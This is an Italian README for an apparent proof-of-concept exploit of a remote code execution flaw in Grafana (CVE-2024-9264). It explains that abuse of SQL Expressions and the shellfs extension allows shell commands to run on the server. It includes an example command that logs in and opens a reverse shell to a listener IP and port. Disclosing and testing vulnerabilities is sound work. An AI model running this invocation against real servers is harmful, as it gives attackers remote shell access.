
Exploit RCE per Grafana (CVE-2024-9264)
Proof of Concept per l'esecuzione di codice remoto in Grafana (CVE-2024-9264)
Questo repository contiene uno script Python che sfrutta una vulnerabilità di esecuzione di codice remoto (RCE) nelle Espressioni SQL di Grafana. Sfruttando una sanitizzazione insufficiente degli input, questo exploit consente a un attaccante di eseguire comandi shell arbitrari sul server. Ciò è reso possibile dall'estensione community shellfs, che può essere installata e caricata da un attaccante per facilitare l'esecuzione dei comandi.
Viewer o superioriGrafana >= v11.0.0 (tutte le v11.x.y sono interessate)
python3 poc.py [--url <target>] [--username <username>] [--password <password>] [--reverse-ip <IP>] [--reverse-port <PORT>]

python poc.py --url http://127.0.0.1:3000 --username eviluser --password eviluser --reverse-ip 10.10.1.41 --reverse-port 9001
Questo script è inteso a scopo educativo e per uso in ambienti controllati dove si ha il permesso di testare la sicurezza del sistema. L'uso improprio di questo strumento potrebbe portare a conseguenze legali.